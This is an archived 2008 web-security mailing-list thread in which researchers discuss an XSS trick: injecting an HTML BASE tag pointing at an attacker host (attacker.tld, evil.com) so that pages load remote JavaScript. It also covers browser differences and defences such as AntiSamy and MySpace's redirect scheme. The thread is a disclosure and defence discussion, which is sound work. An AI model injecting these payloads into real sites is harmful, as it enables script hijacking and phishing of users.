[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [WEB SECURITY] Nice little XSS trick

From: "James Landis" <jcl24@xxxxxxxxxxx>
Subject: Re: [WEB SECURITY] Nice little XSS trick
Date: Thu, 17 Jul 2008 08:34:10 -0700

No offense taken! I wasn't blaming Joe Web Dev for not following the
spec, I was blaming browser vendors. Quirks-mode rendering is what has
gotten us into the situation where Web developers don't have to learn
the spec in the first place. As long as their HTML is close enough, it
renders.

I understand the market pressures that led us down this path. Remember
how quickly we all dumped NS4 when it didn't even show a page at all
if the HTML was broken? Hindsight is 20/20, but to me writing a
permissive parser sounds a hell of a lot harder than just throwing an
error when something breaks spec. Imagine where we would be today if
vendors had gone this route instead of quirks mode.

You said it was almost impossible for browser vendors to address this
problem. Maybe that's true from a market perspective, but not from a
technical one (unless the attacker can inject into the HEAD). That's
the only point I was trying to make about following the spec.

-j

On Thu, Jul 17, 2008 at 7:08 AM, Arshan Dabirsiaghi
<arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx> wrote:
> No offense at all intended, but blaming developers for not following the
> spec is easy but in the end just not very useful. When the most common
> usage deviates from the spec, looking back at the past doesn't help
> much. Incidentally, expecting your everyday Joe Coder to code to spec
> when he receives no formal education of the spec is a very bizarre
> phenomenon IMHO.
>
> Microsoft's improvement of IE7's base-related behavior will trickle down
> though, (un)fortunately. Since IE7 won't process a <base> outside of
> <head>, developers will be forced to alter their sites so that their IE7
> users won't have a broken site. So for sites of any worth, this will now
> be a very corner case exploit.
>
> I even tried wrapping the <base> exploit inside an injected <head> and
> some other things to see if I could trick it into processing it, but
> alas, nothing. Maybe Gareth should fuzz it - these browsers are too
> liberal and I would be surprised if it was 100% bulletproof in this
> respect.
>
> Arshan
>
> -----Original Message-----
> From: elspood@xxxxxxxxx [mailto:elspood@xxxxxxxxx] On Behalf Of James
> Landis
> Sent: Wednesday, July 16, 2008 4:36 PM
> To: Arshan Dabirsiaghi
> Cc: David Byrne; Amit Klein; websecurity@xxxxxxxxxxxxx
> Subject: Re: [WEB SECURITY] Nice little XSS trick
>
> It's almost impossible if the attacker can inject a BASE tag into the
> HEAD.
>
> It's easy if they, oh I dunno, FOLLOW THE SPEC.
>
> -j
>
> On Wed, Jul 16, 2008 at 12:32 PM, Arshan Dabirsiaghi
> <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx> wrote:
>> Yeah, and a typical, unfortunate reaction from sirdarkcat (not typical
>> of him, just of the security community in general). It's different
>> because it'd be trivially easy for the browser vendors to prevent the
>> javascript: technique, but almost impossible to fix this variant.
>>
>> Arshan
>>
>> -----Original Message-----
>> From: David Byrne [mailto:davidribyrne@xxxxxxxxx]
>> Sent: Wednesday, July 16, 2008 3:30 PM
>> To: Arshan Dabirsiaghi; Amit Klein
>> Cc: websecurity@xxxxxxxxxxxxx
>> Subject: Re: [WEB SECURITY] Nice little XSS trick
>>
>> I need to indulge my vanity :) I posted something similar almost a
> year
>> ago. Granted, I didn't take the time to write it up nicely.
>>
>> http://sla.ckers.org/forum/read.php?2,14751
>>
>>
>>
>>
>> ----- Original Message ----
>> From: Arshan Dabirsiaghi <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
>> To: Amit Klein <aksecurity@xxxxxxxxx>
>> Cc: websecurity@xxxxxxxxxxxxx
>> Sent: Wednesday, July 16, 2008 8:45:28 AM
>> Subject: RE: [WEB SECURITY] Nice little XSS trick
>>
>> You're too nice - no need to apologize or defer credit. You discovered
>> it on your own. If you can't find it in Google, CWE or the OWASP
> Testing
>> Guide, I frankly don't think you can call it public knowledge, and
>> therefore it should be publicly discussed.
>>
>> Arshan
>>
>> -----Original Message-----
>> From: Amit Klein [mailto:aksecurity@xxxxxxxxx]
>> Sent: Wednesday, July 16, 2008 10:34 AM
>> To: Arshan Dabirsiaghi
>> Cc: websecurity@xxxxxxxxxxxxx
>> Subject: Re: [WEB SECURITY] Nice little XSS trick
>>
>> Hi Arshan+list,
>>
>> Indeed - the same vulnerability. I did google for it, but I didn't
>> pick up your site (and RSnake's cheat sheet doesn't list it - now I
>> know why).
>>
>> Anyway - sorry. You deserve full credit for it, of course.
>>
>> Thanks for the correction and the further information,
>> -Amit
>>
>>
>> On 7/16/08, Arshan Dabirsiaghi <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
>> wrote:
>>>
>>>
>>>
>>> http://i8jesus.com/?p=10 (Jan 2008)
>>>
>>>
>>> I also presented this vector last year at OWASP San Jose when I
>> demo'ed
>>> AntiSamy as an example of dangerous content that isn't malicious code
>> on its
>>> own. That's one of the selling points of AntiSamy - it stops not only
>> XSS
>>> (well, we hope) but also prevents phishing attacks that abuse
>> HTML/CSS.
>>>
>>>
>>>
>>> I talked about it with RSnake afterwards and he had some crazy reason
>> for
>>> not putting it on his cheatsheet - claimed it was too much like the
>> <base
>>> href="javascript:foo();//"> vector. As noted on my blog post, IE7 is
>> longer
>>> (according to policy) supposed to be honoring <base> tags outside of
>> <HEAD>,
>>> but FF is still vulnerable. You could use this to hijack anything -
>>> stylesheets (more XSS/phishing), images, scripts, etc. The only thing
>> <base>
>>> won't help you steal as far as resources is anything gathered in
>> JavaScript.
>>>
>>>
>>>
>>> I think some of the big players had this figured out already (or more
>>> likely, just got really lucky). MySpace takes <base href> values,
>> base64
>>> encodes them, and redirects them through another domain. The flow is
>> like
>>> this for them:
>>>
>>>
>>>
>>> 1.       User puts in <base href="http://evil.com";>
>>>
>>> 2.       Str = base64("http://evil.com";)
>>>
>>> 3.       Profile = <base
>>> href="http://msplinks.com/redir?<base64encodedStr>
>>>
>>>
>>>
>>> Maybe there's a way to abuse that, but I don't think so. And eBay
>> doesn't
>>> have any relative links after user content, at least when I first
>> looked at
>>> this last year. They probably both just got lucky. =]
>>>
>>>
>>>
>>> Arshan
>>>
>>>
>>>
>>> ---------- Previous message ----------
>>>
>>> From: Amit Klein <aksecurity@xxxxxxxxx>
>>>
>>> Date: Tue, Jul 15, 2008 at 7:33 AM
>>>
>>> Subject: [WEB SECURITY] Nice little XSS trick
>>>
>>> To: Web Security <websecurity@xxxxxxxxxxxxx>
>>>
>>>
>>>
>>>
>>>
>>> Hi list
>>>
>>>
>>>
>>> Recently I've been thinking about bypassing anti-XSS filters, and a
>> nice
>>> little trick occurred to me, which I haven't seen anywhere (e.g. it's
>> not on
>>> RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does
>> mention
>>> BASe, but not the trick I describe here). The idea is to use the HTML
>> BASE
>>> tag to force loading of JS code from the attacker's host. Consider a
>> page
>>> with XSS vulnerability such as:
>>>
>>>
>>>
>>> <html>
>>>
>>> ...
>>>
>>> ***XSS code may be embedded here***
>>>
>>> ...
>>>
>>> <script src="/foo/bar.js"></script>
>>>
>>> ...
>>>
>>> </html>
>>>
>>>
>>>
>>> Now, an attacker can inject <base
>>> href="http://www.attacker.tld/";>, and next thing you know,
>>> the browser (IE, at least) loads the JS from
>>> http://www.attacker.tld/foo/bar.js... And the beauty is
>>> that there's no "explicit" JS code involved in the payload itself.
>>>
>>>
>>>
>>> Note that according to the HTML standard, BASE should be placed in
> the
>> HEAD
>>> section
>>> (http://www.w3.org/TR/html401/struct/links.html#edef-BASE).
>>> This is indeed observed by FF 2, but not by IE (checked IE6).
>>>
>>>
>>>
>>> Thanks,
>>>
>>> -Amit
>>
>>
> ------------------------------------------------------------------------
>> ----
>> Join us on IRC: irc.freenode.net #webappsec
>>
>> Have a question? Search The Web Security Mailing List Archives:
>> http://www.webappsec.org/lists/websecurity/archive/
>>
>> Subscribe via RSS:
>> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>>
>> Join WASC on LinkedIn
>> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>>
>>
>>
>>
>>
> ------------------------------------------------------------------------
> ----
>> Join us on IRC: irc.freenode.net #webappsec
>>
>> Have a question? Search The Web Security Mailing List Archives:
>> http://www.webappsec.org/lists/websecurity/archive/
>>
>> Subscribe via RSS:
>> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>>
>> Join WASC on LinkedIn
>> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>>
>>
>

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA

References:
- Re: [WEB SECURITY] Nice little XSS trick
  - From: David Byrne
- RE: [WEB SECURITY] Nice little XSS trick
  - From: Arshan Dabirsiaghi
- Re: [WEB SECURITY] Nice little XSS trick
  - From: James Landis
- RE: [WEB SECURITY] Nice little XSS trick
  - From: Arshan Dabirsiaghi

Prev by Date: [WEB SECURITY] ActivePerl
Next by Date: Re: [WEB SECURITY] Paper draft: Enough With Default Allow in Web Applications!
Previous by thread: RE: [WEB SECURITY] Nice little XSS trick
Next by thread: [WEB SECURITY] Corsaire whitepaper: Breaking the Bank (Vulnerabilities in Numeric Processing within Financial Applications)
Index(es):
- Date
- Thread

Brought to you by http://www.webappsec.org
Search this site